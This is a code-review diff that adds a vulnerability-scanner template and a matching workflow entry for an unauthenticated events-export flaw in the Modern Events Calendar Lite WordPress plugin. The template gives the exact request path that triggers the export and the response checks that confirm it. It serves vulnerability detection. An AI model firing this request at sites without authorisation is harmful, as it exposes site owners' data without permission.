Merge pull request #1338 from random-robbie/patch-12

Create wp-modern-events-calendar-lite.yml

vulnerabilities/wordpress/wp-modern-events-calendar-lite.yml

@@ -0,0 +1,24 @@
+id: wp-modern-events-calendar-lite
+
+info:
+  name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+  author: random_robbie
+  severity: medium
+  tags: wordpress,wp-plugin
+  reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "mec-events"
+        part: header
+
+      - type: status
+        status:
+          - 200

workflows/wordpress-workflow.yaml

@@ -55,4 +55,5 @@ workflows:
           - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
           - template: vulnerabilities/wordpress/wp-uploads-listing.yaml
           - template: vulnerabilities/wordpress/wp-license-file.yaml
-          - template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+          - template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+          - template: vulnerabilities/wordpress/wp-modern-events-calendar-lite.yaml